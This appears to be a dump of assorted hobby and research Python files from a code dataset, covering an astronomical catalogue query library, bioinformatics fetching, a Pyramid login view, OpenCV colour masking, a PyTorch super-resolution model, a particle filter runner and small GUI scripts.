objects:\n\n >>> objectList = listObjects(type=\"Dup\")\n >>> print(objectList[0])\n IC0011, Duplicated record in Cas\n\n The maxSize filter will include objects with no size recorded in database:\n\n >>> objectList = listObjects(maxsize=0)\n >>> len(objectList)\n 2015\n\n \"\"\"\n available_filters = ['catalog',\n 'type',\n 'constellation',\n 'minsize',\n 'maxsize',\n 'uptobmag',\n 'uptovmag',\n 'withname']\n cols = 'objects.name'\n tables = 'objects'\n\n if kwargs == {}:\n params = '1'\n return [Dso(str(item[0]), True) for item in _queryFetchMany(cols, tables, params)]\n for element in kwargs:\n if element not in available_filters:\n raise ValueError(\"Wrong filter name.\")\n\n paramslist = []\n if \"catalog\" in kwargs:\n if kwargs[\"catalog\"].upper() == \"NGC\" or kwargs[\"catalog\"].upper() == \"IC\":\n paramslist.append('name LIKE \"' + kwargs[\"catalog\"].upper() + '%\"')\n elif kwargs[\"catalog\"].upper() == \"M\":\n paramslist.append('messier != \"\"')\n else:\n raise ValueError('Wrong value for catalog filter. [NGC|IC|M]')\n if \"type\" in kwargs:\n paramslist.append('type = \"' + kwargs[\"type\"] + '\"')\n if \"constellation\" in kwargs:\n paramslist.append('const = \"' + kwargs[\"constellation\"].capitalize() + '\"')\n if \"minsize\" in kwargs:\n paramslist.append('majax >= ' + str(kwargs[\"minsize\"]))\n if \"maxsize\" in kwargs:\n paramslist.append('(majax < ' + str(kwargs[\"maxsize\"]) + ' OR majax is NULL)')\n if \"uptobmag\" in kwargs:\n paramslist.append('bmag <= ' + str(kwargs[\"uptobmag\"]))\n if \"uptovmag\" in kwargs:\n paramslist.append('vmag <= ' + str(kwargs[\"uptovmag\"]))\n if \"withname\" in kwargs and kwargs[\"withname\"] is True:\n paramslist.append('commonnames != \"\"')\n elif \"withname\" in kwargs and kwargs[\"withname\"] is False:\n paramslist.append('commonnames = \"\"')\n\n params = \" AND \".join(paramslist)\n return [Dso(item[0], True) for item in _queryFetchMany(cols, tables, params)]\n\n\ndef nearby(coords_string, separation=60, catalog=\"all\"):\n \"\"\"Search for objects around given coordinates.\n\n :param string coords: A.R. and Dec of the center of search\n :param float separation: search radius expressed in arcmin - default 60\n :param optional string catalog: filter for \"NGC\" or \"IC\" objects - default is all\n :returns: list of Dso objects within limits ordered by distance [(Dso, separation),]\n\n Returns all objects around a point expressed by the coords parameter and within a search\n radius expressed by the separation parameter.\n Coordinates must be Right Ascension and Declination expressed as a string in the\n form \"HH:MM:SS.ss +/-DD:MM:SS.s\".\n\n The maximum allowed search radius is 600 arcmin (10 degrees) and default value is 60.\n\n It returns a list of of tuples with the Dso objects found in range and its distance,\n or an empty list if no object is found:\n\n >>> nearby('11:08:44 -00:09:01.3') #doctest: +ELLIPSIS\n [(<__main__.Dso object at 0x...>, 0.1799936868460791), \\\n(<__main__.Dso object at 0x...>, 0.7398295985600021), \\\n(<__main__.Dso object at 0x...>, 0.9810037613087355)]\n\n The optional \"catalog\" parameter can be used to filter the search to only NGC or IC objects:\n\n >>> nearby('11:08:44 -00:09:01.3', separation=60, catalog='NGC') #doctest: +ELLIPSIS\n [(<__main__.Dso object at 0x...>, 0.7398295985600021)]\n \"\"\"\n if separation > 600:\n raise ValueError('The maximum search radius allowed is 10 degrees.')\n\n coords = _str_to_coords(coords_string)\n\n cols = 'objects.name'\n tables = 'objects'\n params = 'type != \"Dup\"'\n if catalog.upper() in [\"NGC\", \"IC\"]:\n params += ' AND name LIKE \"{}%\"'.format(catalog.upper())\n\n params += _limiting_coords(coords, np.ceil(separation / 60))\n\n neighbors = []\n for item in _queryFetchMany(cols, tables, params):\n possibleNeighbor = Dso(item[0])\n distance = _distance(coords, possibleNeighbor.getCoords())[0]\n if distance <= (separation / 60):\n neighbors.append((possibleNeighbor, distance))\n\n return sorted(neighbors, key=lambda neighbor: neighbor[1])\n\n\ndef printDetails(dso):\n \"\"\"Prints a detailed description of the object in a formatted output.\n\n :param dso: a Dso object or a string with the NGC/IC identifier\n :returns: string\n\n This function returns a string with all the available details of the object,\n formatted in a way to fit a 80cols display.\n The object can be identified by its name as a string or by a Dso type:\n\n >>> print(printDetails(\"ngc1\"))\n +-----------------------------------------------------------------------------+\n | Id: 5612 Name: NGC0001 Type: Galaxy |\n | R.A.: 00:07:15.84 Dec.: +27:42:29.1 Constellation: Peg |\n +-----------------------------------------------------------------------------+\n | Major axis: 1.57' Minor axis: 1.07' Position angle: 112° |\n | B-mag: 13.4 V-mag: N/A J-mag: 10.78 H-mag: 10.02 K-mag: 9.76 |\n | |\n | Surface brightness: 23.13 Hubble classification: Sb |\n +-----------------------------------------------------------------------------+\n | Other identifiers: |\n | 2MASX J00071582+2742291, IRAS 00047+2725, MCG +04-01-025, PGC 000564, |\n | UGC 00057 |\n +-----------------------------------------------------------------------------+\n \n\n If the object is not found in the database it returns a ValueError:\n\n >>> printDetails(\"ngc1a\")\n Traceback (most recent call last):\n ...\n ValueError: Object named NGC0001A not found in the database.\n\n \"\"\"\n def _justifyText(text):\n \"\"\"Prints the text on multiple lines if length is more than 73 chars.\n\n :param string text: text to be printed\n \"\"\"\n text_returned = ''\n chunks = text.split()\n line = []\n lineLength = 0\n for chunk in chunks:\n lineLength += len(chunk) + 1\n if lineLength <= 73:\n line.append(chunk)\n continue\n else:\n text_returned += ('{:5}{:73}{}'.format(\"|\", \" \".join(line), \"|\\n\"))\n del line[:]\n line.append(chunk)\n lineLength = len(chunk) + 1\n text_returned += ('{:5}{:73}{}'.format(\"|\", \" \".join(line), \"|\\n\"))\n return text_returned\n\n if not isinstance(dso, Dso):\n if isinstance(dso, str):\n dso = Dso(dso)\n else:\n raise TypeError('Wrong type as parameter. Either a Dso or string type was expected.')\n\n objType = dso.getType()\n separator = (\"+\" + \"-\" * 77 + \"+\\n\")\n obj_string = separator\n obj_string += ('{:2}{:14}{:24}{:38}{}'.format(\n \"|\",\n \"Id: \" + str(dso.getId()),\n \"Name: \" + dso.getName(),\n \"Type: \" + objType,\n \"|\\n\"))\n obj_string += ('{:2}{:23}{:23}{:30}{}'.format(\n \"|\",\n \"R.A.: \" + dso.getRA(),\n \"Dec.: \" + dso.getDec(),\n \"Constellation: \" + dso.getConstellation(),\n \"|\\n\"))\n\n identifiers = dso.getIdentifiers()\n if (identifiers[0] is not None or\n identifiers[1] is not None or\n identifiers[2] is not None):\n obj_string += ('{:2}{:76}{}'.format(\"|\", \"Also known as: \", \"|\\n\"))\n knownAs = []\n if identifiers[0] is not None:\n knownAs.append(identifiers[0])\n if identifiers[1] is not None:\n knownAs.extend(identifiers[1])\n if identifiers[2] is not None:\n knownAs.extend(identifiers[2])\n obj_string += _justifyText(\", \".join(knownAs))\n\n if identifiers[3] is not None:\n obj_string += ('{:2}{:76}{}'.format(\"|\", \"Common names: \", \"|\\n\"))\n obj_string += _justifyText(\", \".join(identifiers[3]))\n obj_string += separator\n\n dimensions = []\n for i in range(0, 2):\n if dso.getDimensions()[i] is None:\n dimensions.append(\"N/A\")\n else:\n dimensions.append(str(dso.getDimensions()[i]) + \"'\")\n if dso.getDimensions()[2] is None:\n dimensions.append(\"N/A\")\n else:\n dimensions.append(str(dso.getDimensions()[2]) + \"°\")\n obj_string += ('{:2}{:23}{:23}{:30}{}'.format(\n \"|\",\n \"Major axis: \" + dimensions[0],\n \"Minor axis: \" + dimensions[1],\n \"Position angle: \" + dimensions[2],\n \"|\\n\"))\n\n magnitudes = []\n for bandValue in dso.getMagnitudes():\n if bandValue is None:\n magnitudes.append(\"N/A\")\n else:\n magnitudes.append(str(bandValue))\n obj_string += ('{:2}{:15}{:15}{:15}{:15}{:16}{}'.format(\n \"|\",\n \"B-mag: \" + magnitudes[0],\n \"V-mag: \" + magnitudes[1],\n \"J-mag: \" + magnitudes[2],\n \"H-mag: \" + magnitudes[3],\n \"K-mag: \" + magnitudes[4],\n \"|\\n\"))\n obj_string += (\"|\" + \" \" * 77 + \"|\\n\")\n\n if objType == \"Galaxy\":\n obj_string += ('{:2}{:30}{:46}{}'.format(\n \"|\",\n \"Surface brightness: \" + str(dso.getSurfaceBrightness()),\n \"Hubble classification: \" + dso.getHubble(),\n \"|\\n\"))\n\n if objType == \"Planetary Nebula\":\n centralStar = dso.getCStarData()\n if centralStar[0] is not None:\n obj_string += ('{:2}{:76}{}'.format(\"|\", \"Central star identifiers: \", \"|\\n\"))\n obj_string += ('{:5}{:73}{}'.format(\"|\", \", \".join(centralStar[0]), \"|\\n\"))\n obj_string += (\"|\" + \" \" * 77 + \"|\\n\")\n cStarMagnitudes = []\n for i in range(1, 4):\n if centralStar[i] is None:\n cStarMagnitudes.append(\"N/A\")\n else:\n cStarMagnitudes.append(str(centralStar[i]))\n obj_string += ('{:2}{:76}{}'.format(\"|\", \"Central star magnitudes: \", \"|\\n\"))\n obj_string += ('{:5}{:24}{:24}{:25}{}'.format(\n \"|\",\n \"U-mag: \" + cStarMagnitudes[0],\n \"B-mag: \" + cStarMagnitudes[1],\n \"V-mag: \" + cStarMagnitudes[2],\n \"|\\n\"))\n obj_string += separator\n\n if identifiers[4] is not None:\n obj_string += ('{:2}{:76}{}'.format(\"|\", \"Other identifiers: \", \"|\\n\"))\n obj_string += _justifyText(\", \".join(identifiers[4]))\n obj_string += separator\n\n notes = dso.getNotes()\n if notes[0] != \"\":\n obj_string += ('{:2}{:76}{}'.format(\"|\", \"NED notes: \", \"|\\n\"))\n obj_string += _justifyText(notes[0])\n obj_string += separator\n\n if notes[1] != \"\":\n obj_string += ('{:2}{:76}{}'.format(\"|\", \"OpenNGC notes: \", \"|\\n\"))\n obj_string += _justifyText(notes[1])\n obj_string += separator\n return obj_string\n\n\ndef searchAltId(name):\n \"\"\"Search in the database using an alternative identifier.\n\n :param string name: alternative identifier to search for\n :returns: Dso object\n\n This function searches the name passed as parameter in the \"alternative identifiers\" field\n of the database.\n Currently it supports searching for identifiers from these catalogs: LBN, Messier, MWSC,\n PGC, UGC.\n The function return the founded Dso object.\n\n >>> searchAltId(\"pgc5\") #doctest: +ELLIPSIS\n <__main__.Dso object at 0x...>\n\n >>> searchAltId(\"pc5\")\n Traceback (most recent call last):\n ...\n ValueError: Wrong object name. Search can be performed for Messier, PGC, LBN, \\\nMWSC or UGC catalogs.\n\n If no object has been found, it returns a string:\n\n >>> searchAltId(\"pgc555\")\n 'Object not found.'\n\n \"\"\"\n # Make sure user passed a string as parameter\n if not isinstance(name, str):\n raise TypeError('Wrong type as parameter. A string type was expected.')\n\n # Extract catalog name and object number to make sure we search the name in correct form\n nameParts = re.match(r'(LBN|M|MWSC|PGC|UGC)\\s?(\\d+)', name.upper())\n if nameParts is None:\n raise ValueError('Wrong object name. Search can be performed for Messier, '\n 'PGC, LBN, MWSC or UGC catalogs.')\n\n selectWhat = 'objects.name'\n fromWhere = 'objects'\n if nameParts[1] == 'M':\n # M102 == M101\n if nameParts[2] == \"102\":\n constraint = 'messier=\"101\"'\n else:\n constraint = 'messier=\"' + \"{:0>3}\".format(nameParts[2]) + '\"'\n elif nameParts[1] == 'PGC': # 6 digits format\n constraint = 'identifiers LIKE \"%PGC ' + \"{:0>6}\".format(nameParts[2]) + '%\"'\n elif nameParts[1] == 'UGC': # 5 digits format\n constraint = 'identifiers LIKE \"%UGC ' + \"{:0>5}\".format(nameParts[2]) + '%\"'\n elif nameParts[1] == 'MWSC': # 4 digits format\n constraint = 'identifiers LIKE \"%MWSC ' + \"{:0>4}\".format(nameParts[2]) + '%\"'\n elif nameParts[1] == 'LBN': # 3 digits format\n constraint = 'identifiers LIKE \"%LBN ' + \"{:0>3}\".format(nameParts[2]) + '%\"'\n objectData = _queryFetchOne(selectWhat, fromWhere, constraint)\n\n if objectData is not None:\n return Dso(objectData[0])\n else:\n return \"Object not found.\"\n\n\ndef stats():\n try:\n db = sqlite3.connect('file:' + DBPATH + '?mode=ro', uri=True)\n except sqlite3.Error:\n raise OSError('There was a problem accessing database file at ' + DBPATH)\n\n try:\n cursor = db.cursor()\n\n cursor.execute('SELECT objTypes.typedesc, count(*) '\n 'FROM objects JOIN objTypes ON objects.type = objTypes.type '\n 'GROUP BY objects.type')\n typesStats = cursor.fetchall()\n except Exception as err:\n raise err\n finally:\n db.close()\n\n totalObjects = sum(objType[1] for objType in typesStats)\n\n return __version__, DBDATE, totalObjects, typesStats\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","sub_path":"pyongc/ongc.py","file_name":"ongc.py","file_ext":"py","file_size_in_byte":46023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"202896458","text":"# @File : NumberWriter.py\n# @Time : 2019/08/24 16:57:51\n# @Author : Wei Luo \n# @Version : 1.0\n# @Contact : luoweihoo@yahoo.com\n# @Desc : None\n\nimport json\n\nnumbers = [2, 3, 5, 7, 11, 13]\n\nfilename = 'numbers.json'\nwith open(filename, 'w') as f:\n json.dump(numbers, f)\n ","sub_path":"Chapter10/NumberWriter.py","file_name":"NumberWriter.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"646848257","text":"from Bio import Entrez\nfrom Bio import SeqIO\nEntrez.email = \"jcolgan@luc.edu\"\noutput = open(\"humanHerpesvirusCompleteSequence.txt\", 'a')\nhandle = Entrez.efetch(db=\"nucleotide\", id=\"EF999921\", rettype=\"gb\", retmode=\"text\")\nrecord = SeqIO.read(handle, \"genbank\")\ncount =0\nfor feature in record.features:\n if feature.type == \"CDS\":\n count+=1\n feature_name = \"feature.qualifiers\" \n feature_seq = feature.extract(record.seq)\n # Simple FASTA output without line wrapping:\n output.write(\">\" + feature_name + \"\\n\" + str(feature_seq) + \"\\n\")\noutput.close()\noutput=open(\"miniProjectLog\",'a')\noutput.write('The HCMV genome (EF999921) has '+str(count) +' CDS.')\n","sub_path":"SeqGetter.py","file_name":"SeqGetter.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"632712406","text":"import os\n\nfrom mako.template import Template\n\nfrom pyramid.renderers import render\nfrom pyramid.response import Response, FileResponse\n\nfrom pyramid.path import AssetResolver\n\nfrom pyramid.httpexceptions import HTTPNotFound\nfrom pyramid.httpexceptions import HTTPFound\n\nfrom pyramid.security import remember, forget\nfrom pyramid.security import authenticated_userid\n\nfrom trumpet.managers.admin.sitewebview import SiteWebviewManager\nfrom trumpet.managers.admin.sitewebview import SiteAppManager\n\nfrom trumpet.views.base import BasicView, static_asset_response\nfrom trumpet.views.schema import LoginSchema\nfrom trumpet.views.login import check_login_form\n\n\n\n\nclass FrontDoorView(BasicView):\n def __init__(self, request):\n super(FrontDoorView, self).__init__(request)\n if request.method == 'POST':\n self.handle_post()\n else:\n self.handle_get()\n \n def handle_get(self):\n request = self.request\n view = request.view_name\n subpath = request.subpath\n if not view:\n route = self.request.matched_route.name\n if route == 'home':\n self.response = HTTPFound('/frontdoor')\n return\n raise HTTPNotFound()\n elif view in ['login', 'logout']:\n # This breaks GET has no side effects\n if view == 'logout':\n return self.handle_logout({})\n self.response = HTTPFound('/frontdoor')\n return\n elif view == 'frontdoor':\n if not len(subpath):\n template = 'trumpet:templates/webview-app.mako'\n settings = self.get_app_settings()\n basecolor = settings['default.css.basecolor']\n env = dict(appname='frontdoor', basecolor=basecolor)\n content = render(template, env)\n self.response = Response(body=content)\n self.response.encode_content()\n else:\n assetpath = 'trumpet:static/apps/frontdoor'\n asset = os.path.join(assetpath, *subpath)\n self.response = static_asset_response(request, asset)\n else:\n self.response = HTTPNotFound()\n\n def handle_login(self, post):\n if check_login_form(self.request):\n username = post['username']\n headers = remember(self.request, username)\n self.response = HTTPFound('/frontdoor')\n\n\n def handle_logout(self, post):\n headers = forget(self.request)\n if 'user' in self.request.session:\n del self.request.session['user']\n while self.request.session.keys():\n key = self.request.session.keys()[0]\n del self.request.session[key]\n location = self.request.route_url('home')\n self.response = HTTPFound(location=location, headers=headers)\n \n \n\n def handle_post(self):\n request = self.request\n view = request.view_name\n subpath = request.subpath\n post = request.POST\n if view == 'login':\n return self.handle_login(post)\n elif view == 'login':\n return self.handle_logout(post)\n else:\n return self.handle_login(post)\n\n \n \n","sub_path":"trumpet/views/frontdoor.py","file_name":"frontdoor.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"493383765","text":"# cspace.py\n# The first parameter is the original image, \n# kernel is the matrix with which image is \n# convolved and third parameter is the number \n# of iterations, which will determine how much \n# you want to erode/dilate a given image.\nimport cv2\nimport numpy as np\n\ncap = cv2.VideoCapture(0)\n\nwhile(1):\n # Take each frame\n _, frame = cap.read()\n\n # Convert BGR to HSV\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n # define range of blue color in HSV\n lower_blue = np.array([110,50,50])\n upper_blue = np.array([130,255,255])\n\n # define range of red color in HSV\n lower_red = np.array([161,155,84])\n upper_red = np.array([179,255,255])\n\n # define range of green color in HSV\n lower_green = np.array([40,40,40])\n upper_green = np.array([70,255,255])\n\n # Threshold the HSV image to get only blue colors\n mask = cv2.inRange(hsv, lower_blue, upper_blue)\n mask_red = cv2.inRange(hsv, lower_red, upper_red)\n mask_green = cv2.inRange(hsv, lower_green, upper_green)\n\n # Bitwise-AND mask and original image\n res_red = cv2.bitwise_and(frame,frame, mask= mask_red)\n res_green = cv2.bitwise_and(frame,frame, mask= mask_green)\n res = cv2.bitwise_and(frame,frame, mask= mask)\n\n kernel = np.ones((3,3), np.uint8) # Taking a matrix of size 5 as the kernel\n\n img_erosion_blue = cv2.erode(res, kernel,iterations = 2)\n img_dilation_blue = cv2.dilate(img_erosion_blue, kernel,iterations = 2)\n\n img_erosion_red = cv2.erode(res_red, kernel,iterations = 2)\n img_dilation_red = cv2.dilate(img_erosion_red, kernel,iterations = 2)\n\n img_erosion_green = cv2.erode(res_green, kernel,iterations = 2)\n img_dilation_green = cv2.dilate(img_erosion_green, kernel,iterations = 2)\n \n cv2.imshow('Original',frame)\n\n cv2.imshow('Blue',res)\n cv2.imshow('Red',res_red)\n cv2.imshow('Green',res_green)\n\n cv2.imshow('Mask Blue',mask)\n cv2.imshow('Mask Red',mask_red)\n cv2.imshow('Mask Green',mask_green)\n\n cv2.imshow('Erosion_RED', img_erosion_red)\n cv2.imshow('Dilation_RED', img_dilation_red)\n cv2.imshow('Erosion_BLUE', img_erosion_blue)\n cv2.imshow('Dilation_BLUE', img_dilation_blue)\n cv2.imshow('Erosion_GREEN', img_erosion_green)\n cv2.imshow('Dilation_GREEN', img_dilation_green)\n\n k = cv2.waitKey(5) & 0xFF\n if k == 27:\n break\n\ncv2.destroyAllWindows()\n","sub_path":"rgb.py","file_name":"rgb.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"266453288","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\n@File : EDenseNet.py\n@Contact : lihuichen@stu.scu.edu.cn\n@License : None\n\n@Modify Time @Author @Version @Desciption\n------------ ------- -------- -----------\n20-5-1 上午11:02 LihuiChen improve 1 None\n'''\n\n\nimport torch\nimport torch.nn as nn\n\n\nclass one_conv(nn.Module):\n def __init__(self, input_feature, compress):\n super(one_conv, self).__init__()\n ## todo: the affection of LCL\n self.compress = nn.Conv2d(in_channels = input_feature, out_channels = compress, kernel_size=1, stride=1, padding=0)\n self.explore = nn.Sequential(\n nn.Conv2d(in_channels=input_feature, out_channels=input_feature - compress, kernel_size=3, stride=1, padding=1),\n nn.ReLU(),\n )\n\n def forward(self, x):\n out = self.compress(x)\n media = self.explore(x)\n out = torch.cat([out,media],dim = 1)\n return out\n\nclass blocks(nn.Module):\n def __init__(self, input_feature, compress, layers):\n super(blocks, self).__init__()\n self.layers = layers\n self.blocks = nn.ModuleList()\n for i in range(self.layers):\n self.blocks.append(one_conv(input_feature, compress))\n self.localfusion = nn.Sequential(\n nn.ReLU(),\n nn.Conv2d(in_channels=input_feature, out_channels=input_feature, kernel_size=1, stride=1)\n )\n\n def forward(self, x):\n out = x\n for i in range(self.layers):\n out = self.blocks[i](out)\n out = self.localfusion(out)\n return out+x\n\n\nclass Down(nn.Module):\n def __init__(self, scale, input_feature, output_feature):\n super(Down, self).__init__()\n if scale == 2 :\n self.down = nn.Sequential(\n nn.ReLU(),\n nn.Conv2d(in_channels=input_feature, out_channels=output_feature, kernel_size=4, stride=2,\n padding=1, bias=True)\n )\n if scale == 3:\n self.down = nn.Sequential(\n nn.ReLU(),\n nn.Conv2d(in_channels=input_feature, out_channels=output_feature, kernel_size=5, stride=3,\n padding=1, bias=True)\n )\n if scale == 4:\n self.down = nn.Sequential(\n nn.ReLU(),\n nn.Conv2d(in_channels=input_feature, out_channels=output_feature, kernel_size=4, stride=2,\n padding=1, bias=True),\n nn.ReLU(),\n nn.Conv2d(in_channels=output_feature, out_channels=output_feature, kernel_size=4, stride=2,\n padding=1, bias=True)\n )\n def forward(self, x):\n out = self.down(x)\n return out\n\n\nclass Up(nn.Module):\n def __init__(self, scale, input_feature, output_feature):\n super(Up, self).__init__()\n if scale == 2 :\n self.up = nn.Sequential(\n nn.ReLU(),\n nn.ConvTranspose2d(in_channels=input_feature, out_channels=output_feature, kernel_size=4, stride=2,\n padding=1, bias=True)\n )\n if scale == 3:\n self.up = nn.Sequential(\n nn.ReLU(),\n nn.ConvTranspose2d(in_channels=input_feature, out_channels=output_feature, kernel_size=5, stride=3,\n padding=1, bias=True)\n )\n if scale == 4:\n self.up = nn.Sequential(\n nn.ReLU(),\n nn.ConvTranspose2d(in_channels=input_feature, out_channels=input_feature, kernel_size=4, stride=2,\n padding=1, bias=True),\n nn.ReLU(),\n nn.ConvTranspose2d(in_channels=input_feature, out_channels=output_feature, kernel_size=4, stride=2,\n padding=1, bias=True)\n )\n def forward(self, x):\n out = self.up(x)\n return out\n\n\nclass Net(nn.Module):\n def __init__(self, opt):\n super(Net, self).__init__()\n\n inChannels = opt['in_channels']\n num_feature = opt['num_features']\n compress = opt['compress']\n num_blocks = int(opt['nBlock']/2)\n layers = opt['nDenselayer']\n self.scale = opt['scale']\n self.iteration = opt['iterations']\n\n self.conv_input = nn.Conv2d(in_channels=inChannels, out_channels=num_feature, kernel_size=3, stride=1, padding=1)\n self.conv_output_list = nn.ModuleList([\n nn.Conv2d(in_channels=num_feature, out_channels=inChannels, kernel_size=3, stride=1,\n padding=1) for _ in range(self.iteration)\n ])\n\n self.up_list = nn.ModuleList([\n Up(self.scale, num_feature, num_feature) for _ in range(self.iteration)\n ])\n\n self.down_list = nn.ModuleList([\n Down(self.scale, num_feature, num_feature) for _ in range(self.iteration-1)\n ])\n\n self.IRU_body_list = nn.ModuleList([\n self._make_iru_body(num_feature, compress, layers, num_blocks) for _ in range(self.iteration)\n ])\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.xavier_uniform_(m.weight.data)\n if m.bias is not None:\n m.bias.data.zero_()\n\n def _make_iru_body(self, num_feature, compress, layers, num_blocks):\n return nn.Sequential(*[\n blocks(num_feature, compress, layers) for _ in range(num_blocks)\n ])\n\n\n def forward(self, x):\n # output-1\n out = []\n init_fe = self.conv_input(x)\n high_fe = self.IRU_body_list[0](init_fe) + init_fe\n up_fe = self.up_list[0](high_fe)\n out.append(self.conv_output_list[0](up_fe))\n\n # output-2\n for idx in range(1,self.iteration):\n down_fe = self.down_list[idx-1](up_fe)\n res_fe = high_fe-down_fe\n high_fe = self.IRU_body_list[idx](res_fe)+down_fe\n up_fe = self.up_list[idx](high_fe)\n out.append(self.conv_output_list[idx](up_fe) + out[idx-1])\n\n return out\n\n # down_fe = self.down1(up_fe)\n # res_fe = high_fe-down_fe\n # high_fe = self.IRU_body2(res_fe) + down_fe ## todo: down_fe or res_fe\n # up_fe = self.up2(high_fe)\n # out2 = self.conv_output2(up_fe)\n\n # output-3\n # res_fe = self.down2(nnn)\n # out3 = out-res_fe\n # out = self.Blocks3(out3) + res_fe\n # nnn = self.up3(out)\n # out3 = self.conv_output3(nnn)\n\n\n # output-4\n # res_fe = self.down3(nnn)\n # out4 = out - res_fe\n # out4 = self.Blocks4(out4) + res_fe\n # out4 = self.r(out4)\n\n # return (out1, out1+out2)\n\n\n# class myloss(nn.Module):\n# def __init__(self):\n# super(myloss, self).__init__()\n# self.l1_loss = nn.L1Loss()\n# self.cpl_loss = CPLoss()\n#\n# def __call__(self, output, target):\n# total_loss = self.l1_loss(output, target)\n# total_loss += torch.mul(self.cpl_loss(output, target), 0.1)\n# return total_loss\n\nclass myloss(nn.Module):\n def __init__(self):\n super(myloss, self).__init__()\n self.l1 = nn.L1Loss()\n\n def __call__(self, sr, gt):\n total_loss = 0\n for idx, sr_tmp in enumerate(sr):\n total_loss += self.l1(sr_tmp, gt)\n return total_loss/(idx+1)","sub_path":"networks/EDenseUpDown.py","file_name":"EDenseUpDown.py","file_ext":"py","file_size_in_byte":7404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"93731596","text":"# -*- coding: utf-8 -*-\n\n#convert ui file to python, then import it\nimport os\nos.system('pyuic5 -o Form.py form.ui')\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import *\nimport form\n\nclass MainWindow(QMainWindow):\n \"\"\"the main user interface\"\"\"\n def __init__(self, parent=None):\n super(MainWindow, self).__init__(parent)\n self.ui = form.Ui_MainWindow()\n self.ui.setupUi(self)\n self.data = {}\n self.command = {}\n self.notification = {}\n\n def addNumber(self):\n self.command[\"add\"]()\n self.ui.string.setText(str(self.data[\"num\"]))\n\n","sub_path":"window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"39820488","text":"import sys\nimport os\nimport numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\nfrom PF import PF\nfrom Laser import Laser\nfrom Gridmap import Gridmap\n\n\nif __name__ == \"__main__\":\n\n # This function should be called with two arguments:\n # sys.argv[1]: Pickle file defining problem setup\n # sys.argv[2]: Number of particles (default=100)\n if len(sys.argv) == 3:\n numParticles = int(sys.argv[2])\n elif len(sys.argv) == 2:\n numParticles = 100\n else:\n print(\"usage: RunPF.py Data.pickle numParticles (optional, default=100)\")\n sys.exit(2)\n\n # Load data\n Data = pickle.load(open(sys.argv[1], \"rb\"), encoding=\"latin1\")\n deltat = Data[\"deltat\"] # [0,0]\n occupancy = Data[\"occupancy\"]\n # occupancy = np.array([[0,0,0],[0,0,0],[0,0,0]])\n U = Data[\"U\"]\n X0 = Data[\"X0\"]\n Ranges = Data[\"Ranges\"]\n XGT = Data[\"XGT\"]\n Alpha = Data[\"Alpha\"]\n sparsity = 5\n\n numBearings = Ranges[0, 0].shape[0]\n Ranges = np.array(Ranges.tolist())[:, :, ::sparsity]\n\n # Gridmap class\n gridmap = Gridmap(occupancy)\n\n # Laser class\n laser = Laser(numBearings, sparsity)\n\n # Instantiate the PF class\n pf = PF(numParticles, Alpha, laser, gridmap, visualize=True)\n\n filename = os.path.basename(sys.argv[1]).split(\".\")[0] + \"_Pn\" + str(numParticles)\n pf.run(U, Ranges, deltat, X0, XGT, filename)\n","sub_path":"robotics/ekf_slam_and_pf_localization/code/pf/RunPF.py","file_name":"RunPF.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"78442181","text":"#!/usr/bin/python\n#coding=utf-8\nfrom Tkinter import *\nimport tkFont\n\nwin = Tk()\n\nmyFont = tkFont.Font(family = 'Helvetica', size = 36, weight = 'bold')\n\ndef ledON():\n\tprint(\"LED button pressed\")\n\t\n\tif\t(ledButton[\"text\"]==\"LED ON\"):\n\t\tledButton[\"text\"] = \"LED OFF\"\n\telse:\n\t\tledButton[\"text\"] = \"LED ON\"\n\t\ndef exitProgram():\n\tprint(\"Exit Button pressed\")\n\twin.withdraw()\n\tmainwindowtoo()\n\t#win.quit()\n\ndef mainwindowtoo():\n\twin.title(\"First GUI\")\n\twin.geometry('400x480')\n\n\t\n\tledButton = Button(win, text = \"LED ON\", font = myFont, command = ledON, height = 2, width =8 )\n\tledButton.pack()\n\t\ndef mainwindow():\n\twin.title(\"First GUI\")\n\twin.geometry('800x480')\n\n\texitButton = Button(win, text = \"Exit\", font = myFont, command = exitProgram, height =2 , width = 6) \n\texitButton.pack(side = BOTTOM)\n\n\tledButton = Button(win, text = \"LED ON\", font = myFont, command = ledON, height = 2, width =8 )\n\tledButton.pack()\nmainwindow()\nmainloop()\n","sub_path":"environment/python/gui/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
